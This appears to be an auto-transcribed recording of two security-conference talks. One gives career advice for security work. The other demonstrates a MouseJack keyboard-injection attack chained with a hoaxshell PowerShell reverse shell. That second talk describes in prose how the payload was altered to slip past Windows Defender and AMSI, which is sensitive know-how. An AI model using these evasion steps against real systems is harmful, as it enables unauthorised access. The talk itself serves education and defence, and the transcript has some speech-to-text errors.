translate security into that domain, right, or whatever industry you're in, right? How many of you know what the security requirements are for agriculture? I'm pretty sure there's some agrologists in here, maybe, maybe not, right? Some of you may have worked in transportation. We have health, right? Canada has 10 critical infrastructure sectors. I'm pretty sure we work in one of them, right? So help the IT, help do that translation. Nothing worse than having an IT person or security person... sometimes a security person is not a domain expert. They know security, right? I have all the locks in my briefcase, but I don't know which one to use, right, for your specific context. So there's a lot of opportunity; you have

to know where to look for it so you can find the job that you want, right? So I don't want to talk about money, because money is different, right? So depending, like, consultant, contract things, most people who do contracting, consulting, they don't want to go back to full time, because when you see the money, it's hard to go back, right? So I told them, what do you want? You want balance, your life balance, right? So I took the opportunity to do contract consulting, the same payment as a full-time employee, but I have more time now to spend, to travel, right? So depending on what you want to do with your life, you can do that.

And even project management: I have people who don't want to do software security, but they just want to control... I'm not saying that they're control freaks, but they like to go and be in charge. So I said, want to become a project manager, right? He said, that's not a bad idea, right? So I want to make sure everyone does the right thing, right, instead of the technical stuff, every little thing, so you can just oversee, right? And then some of them, they told me, Vincent, I really want to become a security... I want to become a pen tester. How many of you are pen testers? Raise your hand a little bit.

So how many actually do pen tests like you did in school, where everything you touch, there's holes in almost everything you touch and you can hack almost everything? No. When you go to the real world, everything is fully patched, right, almost fully patched. So you're not going to see that kind of stuff. From my experience, most of my pen testers, after one or two years, they get really sick, because they don't really do pen testing, they just schedule all the scans, right? And there's nothing cool, there's no holes there, right? So I told them, you know, unless you want to be on the red team, or you're going to become one of those, you

might... you have to join a consulting team. You don't join an owner-operator company, right? I don't know where they teach this kind of stuff. I don't see it; over 30 years no one tells me. I had to suffer through, join all the wrong jobs to learn all this stuff. So now I help my students, I help the new immigrants, right? I help people who want to change career, people who have physical limitations. I teach everyone. I have students who are, you know, in drug recovery, just in recovery from spousal abuse and all that, you know, they like security, so I try to help them transition into a better life. So that's one of those things, right? So

hopefully... and I thought, first of all, they just say, oh look, that's a big company, let me apply there, there's another big company, let me apply for a job there. I say, first of all, do you know all those companies you talk about, they're all outsourced, right? So who do you think is working on that side? Probably a project manager or a contract manager, of course, the job is outsourced to someone else. So if you want to do the technical, you have to find the service provider, not the owner-operator, right? So they could look... I said, you know, those big companies, even if they have 10, 15, 20,000 people, maybe just, like, maybe only

like hundreds, depending. If your security team is a very small team, right, you guys who work in a big company, is the security team how many hundreds of people? Not a few hundred, definitely, right? Not even a thousand, even engineering. But I work for companies who are ten thousand, their core engineering maybe 50, maybe 100 if you're lucky, right? Everyone is outsourced, right? They get an EPC, engineering, procurement, construction company, that's where all the 700, 800, 1000 engineers are working, not in the owner-operator, right? How do I know? I go there and ask the engineers, you know what protocol? You think they don't know. I said, where do I get the information? Ask the EPC, right? That's why they know, that's where

it is, right? So these are the kind of things you need to... even for security, right? So nowadays they do have to take accountability now, because of a lot of regulation, like Bill C-sixty, uh, 23, is it 23, 24 or 26? One for security, one is for our privacy. So now they have more and more, one of every type of role and discipline in the company, because you cannot delegate, you cannot outsource accountability, okay. So that's what's happening right now. So you have to keep track of what's going on and what's changing right now in the industry. So how do you find out this kind of stuff? So you join your

professional association, right? Any professional association, they are in tune with all the really boring stuff, like legislation, bylaws, rules, right? Any other stuff is... join the... another way, if you want to become an expert, recognized officially as an expert by Canada, go join, you can understand, the Standards Council of Canada, SCC. Basically, outward-facing, look at the standards that are outside, and then CSA inside Canada. How many of you have participated in CSA and SCC? Raise your hand. Anyone? You guys did not do any? You guys did not participate? You know 27000? Anyone know what the ISO 27000 family is? Yeah, yeah. Well, guess what? I just screwed you

guys up, right, because I was on the board. I voted for Canada, nobody tells me what to do, I just arbitrarily vote. No, I'm just kidding. There's about five to ten of us, and we decide that we speak on behalf of Canada, right? Can you guys do that? Sure you can. Just go there, go to the website, and then just apply, submit your resume in there, or CV, whatever they ask for. Once they look at it, they review it, then they have to send you an official paper, they say you're officially an expert, then you can represent Canada, right, online, okay, represent Canada as an expert. You know, you guys did not know, for 10 years I've been

making decisions on behalf of Canada, all the security stuff, right, on all your behalf. Oh, I'm not on there anymore, I got tired of it. So, because any standard takes about five years to change, five to ten years, so I do give up, I get... I don't get sick of it, so I'll just let you know. Yeah, there's a lot of opportunity. If you want to become an expert, someone going to become famous globally, go to those, and then you can participate in any of the ISO activities. You guys know what ISO stands for? Someone say Standards Association. When I joined them, you know what they told me? International Sightseeing Organization. So they have meetings everywhere around

the world, and the government pays for it, and you go travel, right? Yeah, you guys are laughing. Yes, it's true, right? You guys don't know how to enjoy life. And like the previous speaker talked about, CIPS, talked about engineering, yeah, there was one case where they found someone doing control systems and then he went to court, right? Well, we know what happened, those two always butting heads, and just what happened on that year, I was the expert for both, for CIPS and for engineering. So that was interesting, right? Try to fill out an affidavit, had to go stand before the judge and explain why, you know, who's right, who's

wrong. Those are interesting things, if you really want to get involved to that level, then you have to join them, and they have to give you a piece of paper, they have to test, certify that you are an expert, so you can go testify in front of the judge, right? So that's why you don't normally see any title that says "expert", because it's legal, right? So everything that comes out of your mouth, someone follows, and say they can get, you know... and then someone dies or a place explodes, someone has to go to jail, right? Not right away, okay, because all these professional associations don't have the right; first of all, they take away

your designation, then they can try to punish you, give you a slap. Then if you don't listen, they pass it over to law enforcement under the criminal act, you go to jail, you get fined, okay. So those are the kind of things in reality. That's what you do, right? To me, I take security very seriously, right? To me, it's not a game. So that's why I try to tell my students too, I tell them the reality of it. Everything you learn, the hacking that you do, normally has lots of holes; we do it on purpose so you learn. So you have to write a report. A lot of people think in security you don't have to

write, you don't have to know how to write, you don't have to know how to read, you don't have to do research, right, follow rules, follow policy, right? I have students who say, what do you mean I have to put a title page? What do you mean I have to provide references? I think, no, plagiarism is stealing, right? Academic integrity, violating it is basically like, you know, breaking the rules, right? Part of security is to enforce that, right? That's what you guys do, right? When I say this, when I told them you have to read, they said, what do you mean, reading? I said, you know how many contracts I have to read? Any one of you

read contracts as part of your job? Yeah, right. I mean, it's not a fun thing, but you have to do it, right? Before you do penetration testing, you have to read the thing, right? Read the rules, the policy, before you do any work. You have to read your contract, what you can and cannot do. So I told my students, you know, that's the reality of work. Another thing, too, is background, right? So I keep telling people, it doesn't matter what your background is. Like I say, who's the most important person on a security team? What kind of role, what do you think the background is for security, what occupation, like what kind of domain

subject do you need on the security team? What's the most important? Do you want to take a guess? So it's mathematics, right? Think about it. Information security, what's the fundamental of information security? It's math, right? So you need a mathematician who can tell you exactly why. Math, first of all, they've got the proof mechanism, they have the formalization mechanism, they know how to analyze equations and algorithms, right? I'm not a mathematician, I cannot compete with them, right? I know people will say that, oh, I know a company would say, yeah, don't worry, we just translate all the encryption, we write our own code, we use the library and all that. But all of you will know

that if you were to implement it, right, those of you who know hardware, depending on your CPU, depending on how many digits, depending on how your information, all the bits and bytes or nibbles, are arranged in your computer, the rounding errors, all that, you can potentially cause a vulnerability in your system. That's where a mathematician will come in, can help you out, right? So one of the best persons I ever had was a mathematician on my team, so they can analyze, to see whether whatever we do, they can do all the calculation, probability and stuff like that, right? All these years I've been doing security engineering, I never have to use engineering. Only one time I had to use

the engineering, and that was because they told me, Vincent, you have five, no, you have 10 milliseconds, that's all the time, that's all the time I give you, 10 milliseconds, you put your security inside that time frame. That's the only time I do engineering. Other than that, I never have to do a Disney array; everywhere I just throw a firewall, normally that will solve the problem, okay. So just let me show you about the time. It's time now, 10:20, okay. Yeah, any other questions? Any question at all you want to ask, I'll be more than happy to answer anything you want. And also, another thing I told my students, I said,

if yes... I'll come over with a mic. And I think I tell my students too, if you want to really do all-out tests, use everything you know, do join law enforcement, right? They can do things that regular people cannot do, right? They can do counterintelligence, they can do counterattack. If you do military, I remember when I did military work, I asked a very stupid question, okay. I asked the radio engineer, I said, what frequency do you want me to build the stuff for? He said, what do you mean what frequency? All of them, Vincent. So it's not like just 2.4, 5.0 for IoT, it's the whole spectrum. So that's what I found

fun. Yes? Yeah, well, that's a little loud. The question I had was, you talk a lot about professional associations and standards, education, etc., and I didn't hear anything about open source. What would your recommendation be, I guess, maybe to your students, with respect to involvement in open source as a proving ground for skills, learning cutting-edge technology, using open source? Or is your opinion that it's pretty much constrained to classrooms, security organizations, standards bodies, etc.? Just curious as to your view on open source there. Yeah, so open source, or open, like MOOC or whatever, open courses: normally I ask a student first, right? For my own courses I will ask, I don't want

just to give you, to teach you the course, because it makes no sense if it's not the right course for you, right? I've had students who are 50, 60 years old. I ask, what's your objective? When are you planning to retire, right? I said, you want to spend twenty thousand dollars for a course you're only going to use for, like, three years, and you're going to pay the student loan after you retire, right? So I want to make sure it's the right course for you, right? Guys, I had a student, an accountant, who told me she took security. Then I said, here, that's a good job for you over here. I say, you want to do it? She said, no, Vincent, I

just want to stay home I got two kids I want to stay in for the next 10 years I have to respect that right so I had to guide her towards what she need to achieve which is take care of her kids for the next 10 years right so I said would you like to do uh maybe Operation Center you know do some research that you can do from home okay so I cannot really tell you uh you know you should do this you should do that right My Philosophy is take the one that you want what you know info whatever you want to do and then go for the the gold standard that you want that's how I practice and

that's it and then you try to do I feel yeah I feel man I feel I feel quite a few times right I mean I feel my courses before right so my test that's part of life right then you learn feel fast then you recover so it's not open source they are open source that's good they open courses that's good a lot of places are good they teach you the good stuff so you have to decide which one is right for you you can talk to people and make sure that's the right for you as you know the the in thing right now I'll tell you the latest stuff is something called stackable credential you got sort of stackable credential

you guys know what that is it like CompTIA right when you take four doesn't when you take four exam you end up with eight destination right so you take exam one exam two exam three exam four you got four destination then because you took one and two you get another destination three and four is another one uh so you ended up six to eight destination very quickly those are called stackable credential right they used to have big one you get a certificate or diploma then they found people don't have the time now they go into micro credential now they have stackable credential right now you can actually behind your name you can put a b c d all the way up

to Z right you just have to have a really long business card that's all or flip it to the other side say PLO please look over uh that's the end thing right now in terms of school-wise right in the industry why there is still uh different company have different needs right uh some company doesn't believe in a professional destination now I don't personally I'm not favoring anything any destination I just respect the law of the land that we live in right if the Law changes and say that from now on anyone can call themselves Professional Security I respect the law okay yes I do have background in engineering I have background in I.T and security

but I I want to respect the Lord okay I just don't don't say that I'm favoring one over the other all right so um hopefully I'm not sure I answered you did put in a lot of variables there for me to answer um yeah and then school too right all depending on what you want to do right do you want to pay off or whatever I teach a lot I teach for many different University and colleges I see a lot of my students it's tough when you teach a more vocational level it's really tough when you have students they have to decide whether they pay for the next course or they pay for the uh for their food or

they pay for the rent right so just teaching itself for me is not the thing I have to actually help students right during pandemic I have five students trying to commit suicide right so it's not easy I have one was out in France right he told me I just emailed me say I've been said you know I really feel bad you know I think I'm gonna go kill myself what are you gonna do right it doesn't matter what you teach whether if it's a non-security or security courses so some of my student security courses actually feel the stress I don't know whether you like to hear this kind of stuff but I'm giving the reality of uh you know or what I'm I'm

facing right now in the world right so those are some of the um so and then another thing too that you can um decide to whether you want to work in the private or public sector right so a lot of this stuff too I asked you know what's your objective in life most of the time I don't ask about the job right those of you who take Capstone with me mentoring programming me I never asked her what kind of job because I want to know what's your objective in life and that will help decide on the courses right even if you're 40 years old you say Vincent I want to go take a course or take a program a degree or something

there's a lot of degree trust me okay uh or diploma or certificate they all cost money so then what's your what's your return what do you want to be do you want to be a tag forever or you want to have a career path to go up so I have a lot of students who are asking what's the best ways to stack my experience to stack what I need to do next so that I can achieve what I want to be I want to be head of security I want to become famous most people in the activity may I just want to become famous most people in the industry wants to make money that seems to be the the

general things right so you can you can leverage both too I tell the Professor I say the moment you publish your paper I'm going to take your idea I'm going to go make money right so you have to leverage all this stuff so that way you can um you know decide what you want uh in life and so another thing was uh investment right well you heard about people who just do investment if you guys are all security expert why don't you invest in technology I get phone calls all the time email they say hey Vincent this new up and coming uh this I mean coming uh company they have this brand new security technology so I invest in it

while it's still penny stock or you know so we invest in it right so if you guys are really good in your technology why don't you do that you don't have to work for anyone you can just do investment so there's a lot of different opportunity you can do not just go work for someone first I'll do a lot of presentation for technical school like name and say the first thing the HR tell me Vincent don't tell the students to go get a degree because you can get a diploma you can get a certificate right I tell you most people who graduate from University they are trained to become an employee right most people from technical school they

train to run a business and who do you think they're going to hire they're going to hire those people with the degrees right uh don't get me wrong I have both degree of certificate so I can talk about both so you all decide you guys all can decide what you guys want out of life right so think about carefully all I want to do is share with you some of the information so that you don't think so you know where to go look for that kind of job that you want right I've seen all kinds that's why I asked if you have any questions let me know uh you know or certain areas I didn't expect certain industry uh I can

tell you what is it like so the only places that I enjoy the military is nice the only thing I don't like is that uh you cannot talk about it and then you've got this thing called reliability that after you quit the company you cannot travel you cannot go to certain places do certain things I say I want to travel I don't care so I don't want that clearance so uh so I went to Industrial because you can talk about it more right you can show off a little bit more right uh and you can contribute too right so uh yeah so those are some of the stuff that you can decide I mean OT is a big space but it's getting to be

a little bit more crowded now right but I do want to advise that if you do learn a little bit more technical detail because we reach the point now saturate now where you need to know a little bit more in terms of um you know what do you do what what's actually is happening with that uh technical wise right I'm not saying go to Too Much level but go to the next level because right now every year I graduate you know say for the University I have anywhere from like 400 student graduate with data analytics expertise okay and some of them are push button anyone use power bi anyone use Tableau anyone use those kind

of stuff here do you guys actually know what happened when you push that button see what happening after you push the button that's where the money is right we reach the stage now where we need to know what happened when we push that button right you know how many companies I went through they say you have an industrial firewall they say yes I said what protocol are you filtering they say what do you mean filtering so that's really funny they filter the I.T club and they don't filter the OT side right so uh and then you go to different like keep in mind the world we have is not just not otit right so you go to a building building has

bacnet you have long works you have protocol that OT doesn't use right when you start to deal with satellite you have another four protocol you deal with Telecom you have another three or four more protocols registration to base station base station to head office to front end and then to the Excel those are protocols that you don't have a firewall for for right so that's why when I look at security I don't look at just various uh domain specific so I want you guys because we reached the point now we'll go beyond it now we go beyond OT right so I just want you guys to protect what you guys heard about Vegas how they

track they hack into the uh what was that Casino through hacking the aquarium right because somehow they want to connect the experience to the building management system I believe small firewall have long version back net now you can technically filter the uh uh check the uh the rules for your building uh protocol but there's still a lot of protocols out there for systems that you may never even heard of most of them doesn't even run on IP right like Fast ethernet H1 trophy bus those all doesn't really run on IP right so they run on a different version of ethernet they run on maybe uh 420 milliamps they run on things that you just don't you can still ride the file

you can still write rules the whole concept of having a firewall having rules you can still Implement that in everything in the scada in the PLC in the rtu in your IED in your PCS in your DCS you can Implement all those in those systems how many of you actually Implement that you can also Implement in your devices instrumentation if you have something like uh fieldbus Foundation field bus things like that right so those devices actually have redundancy they have memory their CPU right at the instrumentation site at the right on the instrument so you have five instruments sensor thermos ultrasonic there's actually computer system that backed up redundant each other even if you lose you can operating blind

right we learned about business continuity we learn about Disaster Recovery you have to include all those as part of the operating system I work in the water sectors I know security people said Vincent you have to secure this thing you have to secure that you have to put a firewall here you have to have parts of authentication here and there see that's when you have to talk to The Domain expert I thought to the technician I thought of the process people that said Vincent so what is someone hacking into that system you know we have four four hours window to fix the process right so if someone hacked into that unless they hack the whole thing in the worst

case we're done for three days okay because in Calgary is we don't use chemical we use bacteria right we are now bio nutrient removal technology so in the worst case we have to re-regrow the bacteria again so the fact you have a firewall that's down you just swap it out change it again refresh it we can refresh all our system in less than one hour that's our requirement in 45 minutes so four out four days uh four hours is a lot of time so I don't have to invest a lot in Security in the water sector unless I do linear assets outside the fence like aqueducts check gate pumping station then I had to put a bit

more because they are very far away so when I secure the water from Arizona right 300 miles then I have to do that because helicopter would think so we're trying to figure out how long does it take a helicopter to fly out there to Harbor zoo and things like that so we have to those those calculation those are you know return to time objective and others if the points so those are the kind of thing uh out the world out there it's not just you know security let's put a firewall everywhere right so think about understand the business do we really need it okay and a lot of time we think security is just I.T but there's a lot of things

that business can help uh to secure the business itself right understand the process all I guess is one hour right roughly one hour you can still run out round down to half a second it's not that bad the top one will be um utilities right in half a second a trip in Edmonton will hit the breaker in uh right there very quickly right Tanya okay so basically uh so let you guys care so what is my priority now in life what kind of job am I doing what do you think I'm doing now these days yes I'm over 50 so so uh so the job I'm doing right now is basically uh around my family

I teach at the University because my kids at University when my kids get internship downtown I get a job right across the street I know my kids don't like that but they like it because I get them free right right if they want food I'm right there for them I spent a lot of time with my kids right so I do security job whatever they want I'll do it as long as close to my code so that's my objective in life so you can decide whatever your objective and your security career so fill up decide now what you want to be as your security career all right thank you thank you Dr Chu [Applause] all right

We could just roll into the next presentation, so just get going here. I know this one is gonna be more technical, I'm guessing. That's a good guess.

All right, so we've got our next talk, Scott Taylor. Scott is a senior manager of cyber security for MNP Digital, one of our sponsors today, but not a sponsored talk, it's a personal talk. He leads offensive, industrial, risk and audit engagements across Canada, with over 15 years of experience in IT and cyber security. Scott holds CISSP, OSCP (the shield, the sword), CISA, PCI QSA certifications and has graduated from State and York University. So with his talk entitled "Chaining Hacking Techniques Together", please welcome to the BSides stage Scott Taylor. [Applause]

Thank you everyone, welcome to NAIT, welcome to BSides 2022, at least I think it's 2022. I don't know if I got my time machine here, but anyway, my talk today is called Chaining Hacking Techniques Together, and as it was introduced it is a fairly technical talk, but I do think anyone can get something out of this. So as my introduction, I am Scott Taylor, I'm a senior manager for MNP, my Twitter handle is shoot for root, and please find me on LinkedIn, I always love networking with everyone in this industry. So we're going to start with the obligatory don't do bad things. I'm going to show you some in-depth hacking techniques today, so a lot of stuff that you're not supposed to do, so don't do this if you don't have permission to, and certainly don't say Scott showed me how.

So a little hacking 101. Like our friend Juggernaut here, we need an attack vector to breach the perimeter. So how do we do that? If you follow the MITRE ATT&CK framework, there's generally nine accepted ways of getting that initial access, there's a few more if you include the ICS one. So if we briefly want to go by these: drive-by compromise, that's not driving your car by, that's a website that you go by. External remote services: if you opened up RDP to the world, that's on you. Phishing, that's always going to be the most common way to breach a perimeter, get in a network. Exploit public-facing applications, that's your OWASP stuff, your OWASP Top 10 web application things. Hardware additions: someone breaks into your business, they stick in a Raspberry Pi that gives them a connection. Valid accounts: someone, maybe a malicious insider, has an account, they get in that way. Removable media, that's a USB stick, it's got some malware in it, that's no good. Supply chain: you get a computer from China, they've put a chip in that's malicious, that's no good either. Trusted relationship, that's your third-party service providers, they get popped, you could get popped. Now the closest one to the one I'm going to show you comes in wireless compromise. Now it's not truly wireless, the spirit of that one is more Wi-Fi, what I'm going to show you falls a little bit outside of that, but the point and the takeaway on this is the MITRE ATT&CK framework is a comprehensive framework, it's not necessarily an exhaustive one, there's a few other ways you can get in.

So we're entering MouseJack. This is my all-time most favorite vulnerability of all time. It's now six years old and I still see it a lot today. This was discovered by Marc Newlin and Bastille Research in 2016, they debuted it at DEF CON 24. This affects all wireless keyboards, and we're talking the 2.4 gigahertz variety, not Bluetooth. All major vendors are affected: Logitech, Dell, Microsoft, literally all of them. What it does is it intercepts and then sends unencrypted keystrokes into the keyboard, it's going to be the same as if you're just typing right on the keyboard. So unencrypted is bad. You can inject keystrokes into these vulnerable keyboards up to 100 meters away, so just to put that in perspective, that's about a football field. There's a lot of stuff within a football-field radius of here. And as I pointed out, it's very much still a problem today, we see this on a lot of engagements we do. So have you patched your keyboards? We're talking a little dongle that you put in. Anybody? Do you guys patch your keyboards? No, of course you don't, no one ever thinks to do that.

So we need to do this attack. This is called a Crazyradio PA dongle, you get it for fifty dollars, that's it, little guy, you plug in, you can run some tools with it, do your attack. So demo visual one of what I'm going to show you: that little box on the left is me, shoot for root, and I'm at my bus stop outside my house. The little box on the right, that's symbolic of either, in this case, my house, or it could be your corporate network, it could be really anything. Now that little firewall there is irrelevant, because we're going to go right around it. So the first step is we're going to probe and we're going to see if that keyboard is vulnerable. It's going to come back and it says yes it is, and then we're going to inject the keystrokes, and in the first demo we're going to pop Notepad and put a little message on the screen.

So tools and prep work. The little tool we're going to use inside Kali is called JackIt, and this was written by fellas named phikshun and infamy, and what it does when you run it, that's what we're doing to probe, to see if the keyboard is vulnerable. If it is, it's going to come back, it's going to give you an address and it's going to allow you to inject those keystrokes. To do that, is anybody familiar with Ducky Script? So if you have a Rubber Ducky, it's the exact same language that's used for those. So we're going to utilize the JackIt tool and we're going to write a little Ducky Script for it. Now if you see here it says GUI r, that's the same as if you hit Windows key R, which is going to give you the little Run dialog box, right? I put a little delay in there, because you don't want everything to happen at once, you want to sequentially pause things a little bit. We're going to open the Run box and then we're going to do STRING notepad, I'm going to open Notepad, another little delay, and then put in the string: follow the white rabbit, Neo, or at least follow shoot for root on Twitter.

Okay, so if we follow along on the demo here, you're going to see a couple of screens. Let me just pause here. The screen on the left is my attacking laptop. The screen on the right, I am blind to that, is my desktop inside my house. The bottom here is footage from my Ring camera outside of my house, you can pardon my shoveling job, it's a little icy. So we start the scan from the JackIt tool. I have my vulnerable keyboard plugged in inside the house as I'm walking to the bus stop. Now this scan can take anywhere from about 30 seconds to about five minutes, I've found no real rhyme or reason why sometimes it takes longer than another. Wait a few seconds, there it is, it's detected the vulnerable keyboard, and then I'm going to inject that Ducky Script attack, and right as I do that, pops Notepad: follow the white rabbit, Neo, or at least follow shoot for root on Twitter. So it's very important to understand I am not connected to Wi-Fi in any way, shape or form. So I am outside the house, but I'm within that 100 meters. So this is going to work if you're outside someone's house, if you're in an apartment complex, if you're outside the White House, if you are in a corporate building, you're going to pick up every single vulnerable keyboard, top to bottom.

Now the one caveat I should point out is, when they pop up here, there's no identifying markers other than the type, so I can't actually tell that this is your keyboard, of your business. When we do this on pen tests I usually won't take it past the scan stage, because I can't guarantee these are yours. They could be the building or the office below, it could be the office above. I can say with some certainty it's probably yours, but I can't guarantee it.

Okay, so let's take this one step further. What are we going to do next? We're going to start thinking about how we can chain other attacks together with it. So for you on the offensive side of cyber, it's a basic reverse shell, that's what we want to do next. These are connections that initiate on the target and connect back to the hacker on a listening port, okay? And the reason we do that is because firewalls are going to allow a lot more outbound traffic than they are inbound. If you come outbound on port 80 or 443, it's going to look just like web traffic. If there's any kind of egress filtering, you'll usually get by that.

Weaponization. So if you think about the kill chain, one of the stages is weaponization, and what this means is you're going to be creating some malicious payload and you're going to be tweaking it to fit your purpose. So in this case I've showed you something really old, from about six years ago, I'm going to show you something really new. This is called hoaxshell, and this has just come out a few months ago, if any of you have been following this. So this was created by a fellow named, and I apologize, I can't pronounce either his handle or his real name, but t3l3machus, I think, and Panagiotis Chartas is his real name. Anyway, brilliant tool he wrote here. This is really fancy, it's a heavily obfuscated payload, and it both creates the listener and the payload all in one little platform. Now when he first put this out, this initially bypassed Windows Defender and most EDR products, okay, which is pretty impressive, and that's the GitHub repo right there for it.

So let's talk a little bit about the obfuscation cat-and-mouse game, and I'll start by telling a little story. So when this hoaxshell came out, fully undetected by almost all EDR products, that doesn't usually last long. Usually the products catch wind of it and they figure it out, and then they'll update their definitions, and then you're gonna get blocked from there. So when that first came out, it bypassed everything, and then, if you guys know John Hammond, he put out a YouTube video and he showed off hoaxshell, and within days of that Microsoft updated their definitions. Now this is great if you're defending your network; this is not so great if you're trying to make a talk and write about it, and now they've blocked it. So we have to put a little bit further obfuscation in here. So if you're trying to run a malicious payload, and the anti-malware scanning engine in PowerShell, you might get an error message like that, and that is what you will get here: Dikembe Mutombo does not like it.

So when I was playing around with this, I actually decided to message the creator of the tool on Twitter, and he's a nice guy, and he decided to work with me on the obfuscation techniques to get this by. So I said it was caught, he said, yeah, well, all you have to do is just replace the Invoke-WebRequest with iwr. Now for those of you who understand PowerShell, this is really interesting, because Invoke-WebRequest and iwr do the exact same thing, it's just a shorthand version of it. So if anyone can explain to me why that bypasses stuff, that's interesting to me. So I will run this demo on the obfuscation here. Step one, we run hoaxshell. This is the base64-encoded payload. We want to actually see what's inside of here, so we can just type raw payload. This is the raw payload. Now you can see some of the variables and stuff, those are randomly generated, that he's done in this payload, so he's already done layers of obfuscation on here to bypass these products. A lot of these strings and stuff are turned into variables and shuffled around and all kinds of stuff. So if we pop this into PowerShell and get blocked: Dikembe Mutombo doesn't like it. So as you can see, we have all the real-time protection, all the stuff, all the AMSI engine, it's going to pick it up, it's going to block it. So we just need to tweak it a little bit, maybe we can get a bite.

Now a few things you can do. Let's start with removing the Invoke-WebRequests, so we're just going to put iwrs. Now when I first did this and he told me to do that, it worked, it worked beautifully. So it probably was a few weeks later that that didn't end up working. So again, that cat-and-mouse game, back and forth, back and forth.

We place the iwrs, we pop it, and okay, so we know we need to do a little bit more. A few other little tricks you can do: you can put stuff like plus symbols in with little single quotations there, you can litter the whole thing with that, and then often that will end up fooling a lot of the EDR and antivirus stuff. You can even put stuff like single quotes multiple times throughout other functions and it's still going to work the same, and that sometimes fools it as well. So let's try that. No good. So one more trick we did, and I was talking to the creator of the tool, and he discovered that all we had to do in this particular one is tweak that Invoke-Expression variable, and I put two single quotes in between the I, the E and the X, that's it. Let's fire that through. Oh, look what we got here, shell came through, it's an interactive shell, we can now run commands on the computer.

Okay, so now we've done the weaponization stage. We want to chain that together, so I'm going to walk you through the finale here. So we still have me at the bus stop over here, we got my house right there. The only other component we're going to need here is I need a little bit of C2 infrastructure, and the reason for that is, again, I'm not on Wi-Fi, I can't just dial a connection back to myself, it's got to go somewhere. So we're going to send this out to an AWS server, and I'm going to tether my iPhone at the bus stop and connect to that. So I'm going to force the traffic here and then connect to it. Now a real-life attacker, are you going to use AWS? Probably not, you got to give your credit card, that's no good. You're probably going to spin up an anonymous VPS, pay with crypto, something like that, but that's a little overkill for this demo.

So again, the walkthrough: we're gonna probe, we're gonna see if the keyboard is vulnerable, it's going to come back, say yes, we're going to inject the keystrokes with our new reverse shell payload, we're going to force PowerShell to talk home and pull the hoaxshell payload, it's going to come back, and now we've infected the computer, essentially, and we're going to force that command shell connection back to us. Okay, this is just a little bit of prep work. This is my AWS instance that I spun up. You're going to have to do a few little firewall tweaks on there, remember you got to connect to this through SSH and you got to set up the ports so the listener can catch the shell. If you remember our Ducky Script here before, we were popping Notepad, now we're going to pop PowerShell instead, and that string is that big long raw payload that we discovered in hoaxshell. Okay, now just to make this extra fun, in reality this is the computer inside my house, but this will work if you're sitting outside the White House as well, or anywhere that has this vulnerability. So we have user Joe Biden here, and we have super secret government files sitting on the desktop, and the nuclear codes are one two three four. Let's see if we can grab those.

at the bus stop, but I didn't put the Ring footage on here. So first step, let's check: I'm tethered to my iPhone, I am not connected to any Wi-Fi. I'm going to SSH into my Kali box in AWS.

I am going to generate a new hoaxshell.

Notice the IP address of that, that's up in the cloud. We're going to have a look at our raw payload, because we're going to have to obfuscate it a little bit.

We know all we need to do is really tweak that Invoke-Expression.

Now keep in mind, at the top I got two tabs open. Remember, one tab is up in AWS in the cloud, the other tab is local to my laptop that I'm running the attack from. So we go in here, we're going to have to edit our string that we just created with our new payload.

We are going to run JackIt.

We're going to detect the vulnerable keyboard, we're going to send the attack, and watch carefully. Now we pop PowerShell, and that big long string from hoaxshell gets inputted in there. Now could you do that quietly so it doesn't show up? Maybe, but for the purpose of this demo, that's what's going to show up on the screen. And when that hits, what do we got? We got user Joe Biden, we have popped the shell. Let's have a look at the desktop, and what do we have? Super secret government files, let's have a look. And the nuclear codes, one two three four. Now again, remember, we're not connected to Wi-Fi, we are sitting at the bus stop within 100 meters of the house. There's no network connection of any kind other than tethering through the iPhone up until the AWS infrastructure. So all we've done is forced the computer inside to talk to the cloud, and that gave us an interactive connection with it. Also remember, you got one shot at this. If you have one typo or anything, it's not going to work, so you're blind, you can't see anything, so keep that in mind.

So let's talk about risk for a little bit and put this in a real-life scenario. So we got our little impact-probability matrix. So what are the odds of somebody actually having the skills to do this and having the equipment and actually targeting you to do it? I'd say probably pretty rare, so it's low. Now the impact, though, I mean if you did something like this, it could be very extreme. So that gets us kind of that medium risk, something to think about. So final takeaway is, I mean, you're gonna have to think about all devices on your network. There's all kinds of stuff, just because it doesn't have an IP address doesn't mean it's something you shouldn't think about. People who have very good patch management programs, you have an asset inventory, what all do you put in the asset inventory? Usually things with IP addresses. So if you're patching all of that, that doesn't mean there's other devices laying around that aren't. Now you might think, well, okay, whatever, just go patch all the keyboards. Well, it's not all that simple. If you have an organization and you got 2,000 keyboards laying around, well, are you gonna go one by one and just do them all? Or even if you replace them all, there's a cost associated with that. So it's not something organizations or people really think about, it just kind of flies under the radar. But anyway, I thought I'd take something old, something new, and PowerShell is blue, I guess. So thanks guys for my talk, I guess we'll see if there's any questions.

Thanks, Scott. Round of applause, please. Do we have any questions? Feel free to put up your hand or stand up. I guess while people are thinking about it, for the enterprises, you know, how would we protect against this? Would we want to monitor PowerShell better on our endpoints?

Yeah, so a lot of organizations, as they mature, will have detection capabilities and monitoring of things like PowerShell. It's not even recommended to necessarily block PowerShell, and even if you block PowerShell, you could probably open a command prompt and do something similar. So you're going to want to do that monitoring. The problem with that is, if you have any kind of monitoring, by the time you look at the logs or anything, it's probably too late, you already have the nuclear launch codes. So fortunately, I mean, if we take this keyboard vulnerability, it is gradually phasing out. All new keyboards are not affected by this, it's only anything that's about five years old or older. So as time progresses, this one is gradually going to go away, but as we said, a lot of physical engagements I go to, I run this scan and we pick them up left and right. So something to think about.

Any questions? Oh yeah, we've got one right here.

Hey, thank you for the talk, it was awesome. So I noticed that when we did the IEX call and then you tried to exfiltrate it, and not exfiltrate, but type it out, right, because it's a text file, but what if it's an XML-based file, let's say docx, xlsx or something? Do we need to create another shell, or can we directly exfiltrate it out from this one?

So you're saying when I put that into like WordPad, or, no?

Let's say if I want to exfiltrate some other type of files, like zip, Word, or, like, once you're actually connected, or when you are actually connected, yeah, how do you exfiltrate the other types of files rather than just type, because it won't work.

Well, if you had a real-life attacker, they're probably going to use something a little more comprehensive than even just something like the hoaxshell. So a real-life hacker will probably use a comprehensive C2 framework like Cobalt Strike, so they'll get a beacon inside of there, and then now you got the secure channels back and forth. So that's much stronger. If you got thousands of dollars laying around and you want to get Cobalt Strike, that's perfect. There's some open source ones too that are very powerful as well. So that's typically what a real-life attacker would do.

because it creates those extra channels that makes exfiltrating stuff much easier you can pivot around and create other beacons throughout the network that are going to channel through that so that's probably what they would do
